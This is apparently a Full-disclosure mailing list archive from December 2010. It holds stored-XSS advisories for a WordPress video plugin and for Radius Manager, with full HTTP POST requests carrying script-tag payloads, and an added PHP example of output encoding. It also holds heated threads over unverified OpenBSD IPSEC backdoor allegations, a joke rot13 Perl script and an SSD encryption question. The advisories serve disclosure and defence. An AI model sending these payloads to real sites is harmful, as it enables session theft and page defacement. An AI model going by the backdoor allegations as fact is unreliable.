    $output = preg_replace_callback(REGEXP_2, 'embeddedvideo_plugin_callback', $output);
    $output = preg_replace_callback(REGEXP_3, 'embeddedvideo_plugin_callback', $output);
    return ($output);
}

Request:
http://server/wordpress/wp-admin/post.php
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://server/wordpress/wp-admin/post.php?post=8action=editmessage=1
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1290110435%7C7f9fa1a66aec0259906ea15086aea0c8; wp-settings-time-1=1289940308; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1290110435%7C68b064d813dd8bfaa5d2d2cdf757848e; wp-settings-1=m1%3Do%26m6%3Dc%26m7%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786
_wpnonce=b2bc367f9c_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost
%3D8%26action%3Dedit%26message
%3D1user_ID=1action=editpostoriginalaction=editpostpost_author=1post_type=postoriginal_
post_status=publishreferredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin
%2Fpost.php%3Fpost%3D8%26action%3Dedit_wp_original_http_referer=http%3A%2F
%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action
%3Deditpost_ID=8autosavenonce=96293917c9meta-box-order-
nonce=c2fe5535c4closedpostboxesnonce=bad9dc775bwp-
preview=hidden_post_status=publishpost_status=publishhidden_post_password=hidden_post_v
isibility=publicvisibility=publicpost_password=mm=11jj=17aa=2010hh=00mn=05ss=33hi
dden_mm=11cur_mm=11hidden_jj=17cur_jj=17hidden_aa=2010cur_aa=2010hidden_hh=00
cur_hh=00hidden_mn=05cur_mn=36original_publish=Updatesave=Updatepost_category
%5B%5D=0post_category%5B%5D=1newcategory=New+Category
+Namenewcategory_parent=-1_ajax_nonce-add-category=62352e38f5tax_input%5Bpost_tag
%5D=newtag%5Bpost_tag
%5D=post_title=testandosamplepermalinknonce=4a0d9c8491content=%5Byoutube+%3Cscript
+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert
%281%29%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E+%3Cscript+type%3D%22text
%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert%282%29%0D%0A%2F
%2F+%5D%5D%3E%3C%2Fscript%3E%5Dexcerpt=trackback_url=meta%5B6%5D%5Bkey
%5D=_edit_last_ajax_nonce=5453d93de8meta%5B6%5D%5Bvalue%5D=1meta%5B9%5D
%5Bkey%5D=_edit_lock_ajax_nonce=5453d93de8meta%5B9%5D%5Bvalue
%5D=1289954192meta%5B8%5D%5Bkey%5D=_wp_old_slug_ajax_nonce=5453d93de8meta
%5B8%5D%5Bvalue%5D=metakeyinput=metavalue=_ajax_nonce-add-

[Full-disclosure] Radius Manager Multiple Cross Site Scripting (XSS) Vulnerabilities - CVE-2010-4275

2010-12-17 Thread Rodrigo Branco
Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to 
publish the following vulnerability.



Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Radius Manager Multiple Cross Site Scripting Issues
CVE-2010-4275


INTRODUCTION

Radius Manager is a centralized way for administration of Mikrotik, Cisco, 
Chillispot and StarOS routers and wireless access points.  It has
a centralized accounting system that uses Radius, providing easy user and 
accounting management for ISPs.

This problem was confirmed in the following versions of the Radius Manager, 
other versions may also be affected.

Radius Manager 3.8.0


CVSS Scoring System

The CVSS score is: 6.4
Base Score: 6.7
Temporal Score: 6.4
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal score is: E:F/RL:U/RC:C


DETAILS

The Radius Manager system is affected by Multiple Stored Cross Site Scripting.  
The “Group Name” and “Description” in “new_usergroup” menu do not 
sanitize input data, allowing an attacker to store malicious JavaScript code in 
a page.

The same thing occurs with the “new_nas” menu.

Request:
http://server/admin.php?cont=update_usergroupid=1
POST /admin.php?cont=update_usergroupid=1 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://server/admin.php?cont=edit_usergroupid=1
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Edescr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3ESubmit=Update

Request 2:
http://serveR/admin.php?cont=store_nas
POST /admin.php?cont=store_nas HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://server/admin.php?cont=new_nas
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
name=Namenasip=10.0.0.1type=0secret=descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3ESubmit=Add+NAS



CREDITS

This vulnerability has been brought to our attention by Ulisses Castro from 
Conviso IT Security company (http://www.conviso.com.br) and researched 
internally by Rodrigo Rubira Branco from the Check Point Vulnerability 
Discovery Team (VDT).



Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense
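
Both Check Point advisories above (Embedded Video, CVE-2010-4277, and Radius Manager, CVE-2010-4275) describe submitted values that reach a page without encoding. The PHP below is an added example, not code from either product: it shows a tag callback before and after validation, plus encoding of stored fields at output time. The tag pattern, id rule and function names are assumptions (the advisory shows neither REGEXP_1..3 nor the callback body), and the inputs are constructed from the posted requests.

```php
<?php
// Added example; not code from the Embedded Video plugin or Radius Manager.
// ASSUMPTIONS: tag pattern, id rule and all function names are hypothetical.
// The advisory shows neither REGEXP_1..3 nor embeddedvideo_plugin_callback().

const EV_TAG = '/\[youtube\s+([^\]]*)\]/i';   // hypothetical tag syntax
const EV_ID  = '/\A[A-Za-z0-9_-]{6,20}\z/';   // hypothetical id allow-list

// Encode a value for HTML text or a quoted attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Before": whatever sits inside the tag is copied into the markup.
function ev_callback_unsafe(array $m): string
{
    return '<iframe src="https://www.youtube.com/embed/' . $m[1] . '"></iframe>';
}

// "After": only a well-formed id becomes markup. Anything else is returned
// as encoded text, so the browser displays the tag instead of parsing it.
function ev_callback_safe(array $m): string
{
    $id = trim($m[1]);
    if (preg_match(EV_ID, $id) !== 1) {
        return h($m[0]);
    }
    return '<iframe src="' . h('https://www.youtube.com/embed/' . $id) . '"></iframe>';
}

// Same shape as embeddedvideo_plugin(): run the callback over each tag.
// If the regex engine fails, return encoded text rather than raw content.
function ev_filter(string $content, callable $callback): string
{
    return preg_replace_callback(EV_TAG, $callback, $content) ?? h($content);
}

// Stored fields (the "Group Name" / "Description" case): keep the value as
// submitted and encode it every time it is written into a page.
function render_group_row(array $group): string
{
    $cell = static function ($v): string {
        // Non-string input (for example name[]=x) is rendered as empty.
        return '<td>' . h(is_string($v) ? $v : '') . '</td>';
    };
    return '<tr>' . $cell($group['name'] ?? null)
                  . $cell($group['descr'] ?? null) . '</tr>';
}

// Constructed inputs modelled on the two requests in the advisories.
$post = 'Intro [youtube <script>alert(1)</script>] and [youtube AbCdEf12345]';
parse_str(
    'name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=Lab+routers&Submit=Update',
    $group
);

echo 'unsafe: ', ev_filter($post, 'ev_callback_unsafe'), "\n";
echo 'safe:   ', ev_filter($post, 'ev_callback_safe'), "\n";
echo 'row:    ', render_group_row($group), "\n";
```

Run with `php` from the command line; the "safe" and "row" lines show the script tags as encoded text, while the "unsafe" line carries them through as markup.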


Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Paul Schmehl
--On December 17, 2010 12:31:37 PM -0500 Larry Seltzer 
la...@larryseltzer.com wrote:

 The one thing Mr. Perry has not done, and which, if his claims have any
 merit at all, he could easily do, since he claims he's no longer under
 NDA,
 is post the code that proves that there is a backdoor.  After all, he
 supposedly wrote it, along with others.

 Actually, he did not say that he wrote code. He said that Jason
 Wright and several other developers were responsible for those
 backdoors


I quote Mr. Perry:

I left NETSEC in 2000 to start another venture, I had
some fairly significant concerns with many aspects of these projects,
and I was the lead architect for the site-to-site VPN project
  
developed for Executive Office for United States Attorneys, which was
a statically keyed VPN system used at 235+ US Attorney locations and
which later proved to have been backdoored by the FBI so that they
could recover (potentially) grand jury information from various US
Attorney sites across the United States and abroad.

Still think he never wrote any and had no knowledge of the code?  What does 
lead architect mean?

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead. Thomas Jefferson
There are some ideas so wrong that only a very
intelligent person could believe in them. George Orwell



Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Paul Schmehl
--On December 17, 2010 12:37:34 PM -0500 Григорий 
Братислава musntl...@gmail.com wrote:

 Is no one asking you for is your expertease Mr. Schmehl, is in fact we
 say is you need retire back to мошонка sniffing


Think of me as a bozo detector.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead. Thomas Jefferson
There are some ideas so wrong that only a very
intelligent person could believe in them. George Orwell


Re: [Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool

2010-12-17 Thread Dave Nett
Thank you man.
However has you to has know that the acronym means Open Backdoored Software 
Distribution.

Chairs.

--- On Fri, 12/17/10, Григорий Братислава musntl...@gmail.com wrote:

From: Григорий Братислава musntl...@gmail.com
Subject: [Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool
To: full-disclosure@lists.grok.org.uk
Date: Friday, December 17, 2010, 4:57 PM

Hello full-disclosure!!!

I want to warn you about **potential** problem in is with OpenBSD and
backdoor so I make is for you:
OpeniBDS - OpenBSD is Backdoor Detection System) with BSD license to reuse.


#!/usr/bin/perl -p
# openibds.pl (OpenBSD is Backdoor Detection System)
# Copyright (c) 2011, Григорий Братислава

# is usage:

# cd /usr/src/sys/crypto
# perl pwneruski.pl crypto* | grep pelcgbc | tail -n 1

# is you see pelcgbc then is you has backdoor

# Is tested on OpenBSD, Linux, BeOS

# All rights reserved.

# Redistribution is and use in source and binary forms, is with or without modification,
# are permitted is provided that the following conditions are met:

# Redistributions of is source code must retain the above copyright notice, this list is
# of conditions and the following disclaimer.

# Redistributions in binary form must reproduce the above copyright notice, this is list
# is of conditions and is the following disclaimer in the documentation and/or other
# materials provided with the distribution.

# Neither the name of the Григорий Братислава nor the names of its contributors may be
# used to endorse or promote products derived from this software without specific prior
# written permission.

# THIS SOFTWARE IS IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS IS AND
# IS ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, IS THE IMPLIED
# WARRANTIES IS OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN IS NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT IS LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN IS CONTRACT, STRICT IS LIABILITY, OR IS TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN IS ANY WAY OUT OF THE IS USE OF THIS SOFTWARE, EVEN IF IS ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.

# Each letter is XORed with its table entry, then uc/lc restores the case (rot13).
BEGIN { @a = split //, "/-35753=?=357"x2; }
s.([a-zA-Z]).ord $1<97?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;#is_pwneruski



Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Gary Baribault
I'm an information systems architect, and I do just that, I build the
plan for a system. I select technology and get the overall plan done.
I then hand off the plan to someone who does the design. That person
takes my plan and working with some help from me, gets more physical,
how much bandwidth, memory, CPUs, storage, what DB, specifically how
many modules, what the modules do, what other modules they communicate
with. The designer then hands off his/her design to the programmers.
He/She supervises, and helps with the test cases, but generally does
not see the code. The Architect very rarely sees the code. Check the
lead programmers, and in the case of VPN/IPSec programmers, they are
probably going to be very good programmers with a ton of experience.
Easily capable of this type of thing, but on the other hand, well
known, with a reputation to protect. I'm not saying if this was done or
not, it could be, but probably wasn't.

What you can be sure of is that the actual doing was done much closer
to the programmer than the Architect.

Gary B

On 12/17/2010 12:52 PM, Paul Schmehl wrote:
 --On December 17, 2010 12:31:37 PM -0500 Larry Seltzer
 la...@larryseltzer.com wrote:

 The one thing Mr. Perry has not done, and which, if his claims have any
 merit at all, he could easily do, since he claims he's no longer under
 NDA,
 is post the code that proves that there is a backdoor. After all, he
 supposedly wrote it, along with others.

 Actually, he did not say that he wrote code. He said that Jason
 Wright and several other developers were responsible for those
 backdoors


 I quote Mr. Perry:

 I left NETSEC in 2000 to start another venture, I had
 some fairly significant concerns with many aspects of these projects,
 and I was the lead architect for the site-to-site VPN project
 
 developed for Executive Office for United States Attorneys, which was
 a statically keyed VPN system used at 235+ US Attorney locations and
 which later proved to have been backdoored by the FBI so that they
 could recover (potentially) grand jury information from various US
 Attorney sites across the United States and abroad.

 Still think he never wrote any and had no knowledge of the code? What does
 lead architect mean?



Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Valdis . Kletnieks
On Fri, 17 Dec 2010 11:52:43 CST, Paul Schmehl said:

 Still think he never wrote any and had no knowledge of the code?  What does 
 lead architect mean?

The other architect levels are bronze, silver, gold, and platinum, right?

Most of the time, the chief designer/architect is too busy architecting and
designing to actually sling much code themselves.




Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Григорий Братислава
I is quote Mr. Smell

He is say:

 I was the lead architect for the site-to-site VPN project
  
 developed for Executive Office for United States Attorneys
 ^^

Perry no is say:

I was the lead architect for the backdoor code in is the
^^
OpenBSD crypto vpn
^^

Architect is tell people what to do. Is you think he as architect of
building should keep concrete from foundation? For ten years? You are a
monkey


As is for backdoors in is that time era (1999) this is would be part
of CESA is you know how to Google, you Google it:

http://www.google.com/search?hl=ensource=hpq=cesa+1999+%2Bopenbsd+%2Bcyberspace+electronic+security+actaq=faqi=aql=oq=gs_rfai=шпион!!!

Is you think you is know all of it Paul ВЫ-Arche!!! This bigger than
you know of... is


Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Григорий Братислава
On Fri, Dec 17, 2010 at 1:17 PM,  valdis.kletni...@vt.edu wrote:
 On Fri, 17 Dec 2010 11:52:43 CST, Paul Schmehl said:

 Still think he never wrote any and had no knowledge of the code?  What does
 lead architect mean?

 The other architect levels are bronze, silver, gold, and platinum, right?

 Most of the time, the chief designer/architect is too busy architecting and
 designing to actually sling much code themselves.




Is obvious Valdis must be involved for no agree to Mr. Smell. Valdis
is you must understand is to pay Schmel no mind
(http://www.aolsvc.merriam-webster.aol.com/dictionary/senile) for is
he too smart for all of us to is understand.



Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread news
Has I said, that has may true for your organisation should not be true
for others.

Each organisation has organised has it can. Has small entity may has the
architect design and put the concrete. Has big company most probably has
you said.

It depends. No one except NETSEC has knowing of NETSEC organization.
Anyhas, it has very probability Mr Perry is wright.

Le vendredi 17 décembre 2010 à 13:14 -0500, Gary Baribault a écrit :
 I'm an information systems architect, and I do just that, I build the
 plan for a system. I select technology and get the overall plan done.
 I then hand off the plan to someone who does the design. That person
 takes my plan and working with some help from me, gets more physical,
 how much bandwidth, memory, CPUs, storage, what DB, specifically how
 many modules, what the modules do, what other modules they communicate
 with. The designer then hands off his/her design to the programmers.
 He/She supervises, and helps with the test cases, but generally does
 not see the code. The Architect very rarely sees the code. Check the
 lead programmers, and in the case of VPN/IPSec programmers, they are
 probably going to be very good programmers with a ton of experience.
 Easily capable of this type of thing, but on the other hand, well
 known, with a reputation to protect. I'm not saying if this was done or
 not, it could be, but probably wasn't.
 
 What you can be sure of is that the actual doing was done much closer
 to the programmer than the Architect.
 
 Gary B
 
 On 12/17/2010 12:52 PM, Paul Schmehl wrote:
  --On December 17, 2010 12:31:37 PM -0500 Larry Seltzer 
  la...@larryseltzer.com wrote:
 
  The one thing Mr. Perry has not done, and which, if his claims
 have any
  merit at all, he could easily do, since he claims he's no longer
 under
  NDA,
  is post the code that proves that there is a backdoor. After all,
 he
  supposedly wrote it, along with others.
 
  Actually, he did not say that he wrote code. He said that Jason
  Wright and several other developers were responsible for those
  backdoors
 
 
  I quote Mr. Perry:
 
  I left NETSEC in 2000 to start another venture, I had
  some fairly significant concerns with many aspects of these
 projects,
  and I was the lead architect for the site-to-site VPN project
  
  developed for Executive Office for United States Attorneys, which
 was
  a statically keyed VPN system used at 235+ US Attorney locations and
  which later proved to have been backdoored by the FBI so that they
  could recover (potentially) grand jury information from various US
  Attorney sites across the United States and abroad.
 
  Still think he never wrote any and had no knowledge of the code?
 What does 
  lead architect mean?
 
 

Re: [Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool

2010-12-17 Thread Erik Falor
On Fri, Dec 17, 2010 at 11:57:55AM -0500,  ?? wrote:
 Hello full-disclosure!!!
 
 # !/usr/bin/perl -p
 # openibds.pl (OpenBSD is Backdoor Detection System)
 # Copyright (c) 2011,  

Copyright 2011, huh?  You is can copyright Abhijit Menon-Sen's work,
which is hosted on Jay Kominek's homepage?
http://www.miranda.org/~jkominek/rot13/perl/rot13-evil.pl

[snippity snip]

 BEGIN { @a = split //, "/-35753=?=357"x2; }
 s.([a-zA-Z]).ord $1<97?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;#is_pwneruski

Which is the 5th search result from: 
http://lmgtfy.com/?q=perl+rot13+clever

A mere script kiddie would have gone with the first link on the
results page.  I guess we should be in awe of your awesome google-fu,
if not your 1337 Perl-fu.

-- 
Erik Falor
Registered Linux User #445632 http://counter.li.org



[Full-disclosure] SSD and WDE

2010-12-17 Thread Paul Schmehl
I've spent some time Googling and haven't found anything I wasn't already 
aware of.  I'm wondering if anyone is aware of any academic or technical 
studies of whole disk encryption for solid state discs.  Any issues 
uncovered that only apply to that specific combination and not to WDE in 
general would be of great interest.  (I'm not interested in articles on the 
cold boot attack.  I'm already familiar with that one.)

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead. Thomas Jefferson
There are some ideas so wrong that only a very
intelligent person could believe in them. George Orwell



Re: [Full-disclosure] SSD and WDE

2010-12-17 Thread Abuse007
Hi Paul,

I'm not aware of any, though I'm sure there are some. My understanding is that 
there shouldn't be any major issues with Full Disk Encryption on SSD. Modifying 
files might write the new data to a new physical sector, as part of wear 
levelling, leaving a copy of the old data in the old sector. This might provide 
some benefit to cryptanalysis. 

Compared to having a plaintext file system and then encrypting an existing 
file, which will possibly leave some or all of the plaintext behind due to wear 
levelling - FDE is much better.

On 18/12/2010, at 10:16 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

 I've spent some time Googling and haven't found anything I wasn't already 
 aware of.  I'm wondering if anyone is aware of any academic or technical 
 studies of whole disk encryption for solid state discs.  Any issues 
 uncovered that only apply to that specific combination and not to WDE in 
 general would be of great interest.  (I'm not interested in articles on the 
 cold boot attack.  I'm already familiar with that one.)
 
 -- 
 Paul Schmehl, Senior Infosec Analyst
 As if it wasn't already obvious, my opinions
 are my own and not those of my employer.
 ***
 It is as useless to argue with those who have
 renounced the use of reason as to administer
 medication to the dead. Thomas Jefferson
 There are some ideas so wrong that only a very
 intelligent person could believe in them. George Orwell
 